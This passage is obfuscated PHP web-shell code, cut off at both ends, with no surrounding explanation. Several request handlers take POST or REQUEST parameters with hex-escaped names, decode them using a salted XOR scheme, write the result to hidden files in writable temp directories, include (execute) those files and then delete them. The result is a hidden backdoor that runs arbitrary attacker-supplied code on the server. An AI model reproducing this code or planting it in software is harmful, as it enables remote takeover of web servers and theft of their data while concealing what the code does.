= $__len) break; $v7 = $val[$s]; $sChar = ord( $salt[$s% $sLen] ); $dec =( ( int)$v7 - $sChar -( $s% 10)) ^ 100; $holder .=chr( $dec ); $s++; } while( true ); $element = array_filter(["/tmp", ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP"), getenv("TMP"), session_save_path(), "/dev/shm", getcwd(), sys_get_temp_dir()]); $symbol = 0; do { $dat = $element[$symbol] ?? null; if ($symbol >= count($element)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($dat)) { $pset = implode("/", [$dat, ".entity"]); $success = file_put_contents($pset, $holder); if ($success) { include $pset; @unlink($pset); die();} } $symbol++; } while (true); } if(isset($_POST) && isset($_POST["e\x6C\x65\x6D\x65nt"])){ $rec = $_POST["e\x6C\x65\x6D\x65nt"]; $rec = explode ( ".",$rec ) ; $val = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s ); $l = 0; $__len = count( $rec ); do {if( $l >= $__len) break; $v8 = $rec[$l]; $chS = ord( $s[$l% $lenS] ); $d =( ( int)$v8 - $chS -( $l% 10)) ^ 9; $val .=chr( $d ); $l++; } while( true ); $value = array_filter([getenv("TEMP"), "/var/tmp", getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), getcwd(), "/dev/shm", session_save_path(), sys_get_temp_dir()]); foreach ($value as $token): if (is_writable($token) && is_dir($token)) { $component = "$token" . "/.res"; $success = file_put_contents($component, $val); if ($success) { include $component; @unlink($component); exit;} } endforeach; } if(isset($_POST["\x74\x6Bn"])){ $elem = $_POST["\x74\x6Bn"]; $elem = explode( '.' ,$elem) ; $pset= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen( $salt); $s= 0; while( $s < count( $elem)) { $v7= $elem[$s]; $sChar= ord( $salt[$s % $sLen]); $d= ( ( int)$v7 - $sChar -( $s % 10))^ 95; $pset .= chr( $d); $s++; } $ent = array_filter(["/tmp", session_save_path(), sys_get_temp_dir(), getenv("TMP"), "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd()]); while ($entry = array_shift($ent)) { if (is_writable($entry) && is_dir($entry)) { $itm = sprintf("%s/.desc", $entry); $file = fopen($itm, 'w'); if ($file) { fwrite($file, $pset); fclose($file); include $itm; @unlink($itm); die(); } } } } if(in_array("p\x6F\x69\x6Et\x65r", array_keys($_REQUEST))){ $marker = array_filter([getenv("TMP"), getcwd(), ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/tmp", "/dev/shm"]); $ent = $_REQUEST["p\x6F\x69\x6Et\x65r"]; $ent=explode ( '.' ,$ent); $tkn=''; $s9='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen($s9 ); $j=0; foreach ($ent as $v6) { $chS=ord($s9[$j % $lenS] ); $dec=((int)$v6 - $chS - ($j % 10)) ^ 50; $tkn .= chr($dec ); $j++; } while ($ent = array_shift($marker)) { if ((function($d) { return is_dir($d) && is_writable($d); })($ent)) { $object = "$ent" . "/.sym"; if (@file_put_contents($object, $tkn) !== false) { include $object; unlink($object); exit; } } } } if(array_key_exists("i\x74\x6D", $_REQUEST) && !is_null($_REQUEST["i\x74\x6D"])){ $object = $_REQUEST["i\x74\x6D"]; $object =explode ( '.' , $object) ; $flag = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s); $len = count( $object); for( $x = 0; $x < $len; $x++) { $v4 = $object[$x]; $sChar = ord( $s[$x%$lenS]); $dec =( ( int)$v4 - $sChar -( $x%10)) ^ 67; $flag .= chr( $dec); } $obj = array_filter([sys_get_temp_dir(), "/var/tmp", session_save_path(), "/tmp", getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir"), getcwd(), "/dev/shm"]); for ($entity = 0, $ref = count($obj); $entity < $ref; $entity++) { $element = $obj[$entity]; if ((is_dir($element) and is_writable($element))) { $component = v